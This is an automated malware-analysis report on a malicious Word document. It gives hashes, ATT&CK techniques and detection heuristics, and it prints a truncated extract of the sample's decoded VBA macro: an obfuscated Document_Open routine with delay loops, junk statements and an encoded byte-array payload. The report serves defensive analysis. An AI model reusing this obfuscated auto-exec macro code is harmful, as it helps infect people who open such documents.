Office (OLE) malware analysis — malicious · f0b3f5b7fee0621f

MALICIOUS

Office (OLE)

238.0 KB Created: 2015-12-20 00:46:00 Authoring application: Microsoft Office Word First seen: 2017-11-29

MD5: 34e0ac68603a48d4fa0e2dc795bb7627 SHA-1: 231921cc65d0d2145d492a8a54877e2ae99df96d SHA-256: f0b3f5b7fee0621f1a8e8a75c0150c9829a3c48fc6a957a861b13672261d3f66

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains a Document_Open VBA macro that executes obfuscated code. This macro utilizes the Shell() function, indicating an attempt to run external commands or download and execute a secondary payload. The presence of a password-protected archive lure heuristic suggests the document is designed to trick the user into providing a password to decrypt a malicious payload. The VBA code's obfuscation and use of Shell() strongly suggest a downloader or dropper functionality.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45842 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45842 bytes
SHA-256: `0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True #If VBA7 Then Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long #Else Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long #End If Dim HLnJXH1bmOF3 As String, GyCvq As Integer Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant Sub Document_Open() R7O1H2H3zI = 66 + "25" On Error Resume Next MD1XgpZ1pvB55y = 22 + "85" Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long Ea7EVpjs = 70 + "46" Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0 BzWEvA933 = 88 + "20" For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME WFoVlONXW2AD = WFoVlONXW2AD + 1 Next Bna2eaHvItP2PN JZL4UQ92uel4B = 23 + "62" If WFoVlONXW2AD = Kf0pgDeD2QME Then SeLEK = 56 + "91" Dim S3VoJ54dB As Integer, B4HWNSKEwh As String For S3VoJ54dB = 6 To 974 B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB Next JJcm1AOrQT3 = 14 + "18" YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48) Qio6JWniPunO = 41 + "8" If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then SmEqmQo7WIE = 98 + "90" MYlp4jaVW = 67 + "77" If zKK(73) = True Then G2OERK33o = 48 + "8" SiNwcydd NsBU3RiWPAsR5kv = 90 + "79" Else NhJrp6cE4jcxsT5 = 89 + "58" MA9o9cPSK5hcO PMUmGTj7VBjk = 79 + "39" End If Else W1JPoqO = 93 + "45" MA9o9cPSK5hcO LIx5J0DQDSAph = 98 + "30" End If CxR = 70 + "43" Else Yh9QEdd8 = 52 + "97" MA9o9cPSK5hcO HxFz4G3yVn = 75 + "27" End If HDyHXOIsEi7F = 86 + "94" End Sub Sub MA9o9cPSK5hcO() DRJ9RcaC34U = 10 + "97" Stop Partition 58, 6, 35, 21 XmvssUFxoSD = Fix(90) DateSerial 55, 60, 54 Beep DateDiff "AyhPtMJO", 63, 89 REQh0kUI80hO = CVErr(10) Round 50, 76 Resume Log 51 H6JRAMZiRO1sMhOdf = 20 + "28" End Sub Sub JIT9N(PqcAr2DChjNPmswxj As Long) Ofj = 29 + "74" Dim MwUs As Long D8vzZy23Yrz = 26 + "9" MwUs = Timer + PqcAr2DChjNPmswxj Do While Timer < MwUs DoEvents Loop KKKBu1p93DmpgX = 77 + "1" End Sub Sub SiNwcydd() G1I0ynas = 45 + "84" On Error Resume Next EIbYaWWMmRw = 69 + "45" GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216) PeP = 79 + "67" GyCvq2 ... (truncated)

SHA-256: 0b3046f781918dc9b8e4cb2ee912ab308176f2b8fdc5be6237d3a5e0c96ac852

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function PKRuK2fNdVxFB Lib "T6lvGFt72exxq" Alias "QcghniC" (ByVal S2fmUIJLe As String, A2Rid9IP8w As Long) As Long
#Else
Private Declare Function PKRuK2fNdVxFB lib "T6lvGFt72exxq" Alias "QcghniC"(byval S2fmUIJLe as String, A2Rid9IP8w as Long ) as Long
#End If
Dim HLnJXH1bmOF3 As String, GyCvq As Integer
Dim GyCvq1() As Variant, GyCvq2() As Variant, GyCvq3() As Variant, GyCvq4() As Variant, GyCvq5() As Variant, GyCvq6() As Variant, GyCvq7() As Variant, GyCvq8() As Variant, GyCvq9() As Variant, GyCvq10() As Variant
Dim GyCvq11() As Variant, GyCvq12() As Variant, GyCvq13() As Variant, GyCvq14() As Variant, GyCvq15() As Variant, GyCvq16() As Variant, GyCvq17() As Variant, GyCvq18() As Variant, GyCvq19() As Variant, GyCvq20() As Variant
Dim GyCvq21() As Variant, GyCvq22() As Variant, GyCvq23() As Variant, GyCvq24() As Variant, GyCvq25() As Variant, GyCvq26() As Variant, GyCvq27() As Variant, GyCvq28() As Variant, GyCvq29() As Variant, GyCvq30() As Variant, GyCvq31() As Variant, GyCvq32() As Variant, GyCvq33() As Variant, GyCvq34() As Variant, GyCvq35() As Variant, GyCvq36() As Variant
Sub Document_Open()
R7O1H2H3zI = 66 + "25"
On Error Resume Next
MD1XgpZ1pvB55y = 22 + "85"
Dim Kf0pgDeD2QME As Long, Bna2eaHvItP2PN As Long, WFoVlONXW2AD As Long, YtJXNbAM10p As Long
Ea7EVpjs = 70 + "46"
Kf0pgDeD2QME = 92238969: Bna2eaHvItP2PN = 0: WFoVlONXW2AD = 0
BzWEvA933 = 88 + "20"
For Bna2eaHvItP2PN = 1 To Kf0pgDeD2QME
WFoVlONXW2AD = WFoVlONXW2AD + 1
Next Bna2eaHvItP2PN
JZL4UQ92uel4B = 23 + "62"
If WFoVlONXW2AD = Kf0pgDeD2QME Then
SeLEK = 56 + "91"
Dim S3VoJ54dB As Integer, B4HWNSKEwh As String
For S3VoJ54dB = 6 To 974
B4HWNSKEwh = B4HWNSKEwh + S3VoJ54dB
Next
JJcm1AOrQT3 = 14 + "18"
YtJXNbAM10p = PKRuK2fNdVxFB("D69lbG7N", 48)
Qio6JWniPunO = 41 + "8"
If (26.5 + 6 + 26.5 - 6) = (26.5 + 8 + 26.5 - 8) Then
SmEqmQo7WIE = 98 + "90"
MYlp4jaVW = 67 + "77"
If zKK(73) = True Then
G2OERK33o = 48 + "8"
SiNwcydd
NsBU3RiWPAsR5kv = 90 + "79"
Else
NhJrp6cE4jcxsT5 = 89 + "58"
MA9o9cPSK5hcO
PMUmGTj7VBjk = 79 + "39"
End If
Else
W1JPoqO = 93 + "45"
MA9o9cPSK5hcO
LIx5J0DQDSAph = 98 + "30"
End If
CxR = 70 + "43"
Else
Yh9QEdd8 = 52 + "97"
MA9o9cPSK5hcO
HxFz4G3yVn = 75 + "27"
End If
HDyHXOIsEi7F = 86 + "94"
End Sub
Sub MA9o9cPSK5hcO()
DRJ9RcaC34U = 10 + "97"
Stop
Partition 58, 6, 35, 21
XmvssUFxoSD = Fix(90)
DateSerial 55, 60, 54
Beep
DateDiff "AyhPtMJO", 63, 89
REQh0kUI80hO = CVErr(10)
Round 50, 76
Resume
Log 51
H6JRAMZiRO1sMhOdf = 20 + "28"
End Sub
Sub JIT9N(PqcAr2DChjNPmswxj As Long)
Ofj = 29 + "74"
Dim MwUs As Long
D8vzZy23Yrz = 26 + "9"
MwUs = Timer + PqcAr2DChjNPmswxj
Do While Timer < MwUs
DoEvents
Loop
KKKBu1p93DmpgX = 77 + "1"
End Sub
Sub SiNwcydd()
G1I0ynas = 45 + "84"
On Error Resume Next
EIbYaWWMmRw = 69 + "45"
GyCvq1() = Array(172, 166, 172, 231, 170, 179, 8, 70, 107, 29, 30, 97, 44, 25, 126, 56, 66, 81, 2, 7, 122, 106, 105, 28, 10, 127, 107, 99, 111, 102, 99, 12, 53, 53, 52, 51, 80, 57, 19, 56, 18, 74, 100, 35, 64, 6, 116, 74, 123, 39, 38, 30, 110, 33, 84, 100, 93, 120, 73, 91, 125, 98, 89, 37, 59, 61, 30, 60, 34, 28, 18, 66, 77, 44, 65, 98, 73, 91, 7, 14, 62, 96, 19, 116, 23, 57, 96, 100, 24, 25, 24, 57, 38, 89, 57, 65, 126, 119, 114, 119, 1, 30, 24, 52, 60, 39, 107, 58, 91, 12, 114, 120, 111, 92, 114, 106, 83, 10, 117, 5, 48, 111, 29, 10, 105, 107, 110, 107, 248, 219, 146, 240, 193, 195, 217, 195, 159, 239, 223, 206, 206, 212, 219, 153, 138, 192, 185, 151, 254, 246, 223, 160, 149, 234, 195, 183, 147, 194, 128, 237, 226, 229, 195, 216, 216, 172, 161, 161, 180, 191, 163, 169, 185, 187, 190, 187, 206, 246, 187, 210, 182, 200, 137, 131, 208, 203, 229, 246, 195, 203, 168, 218, 129, 178, 160, 192, 187, 171, 157, 204, 200, 214, 216)
PeP = 79 + "67"
GyCvq2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.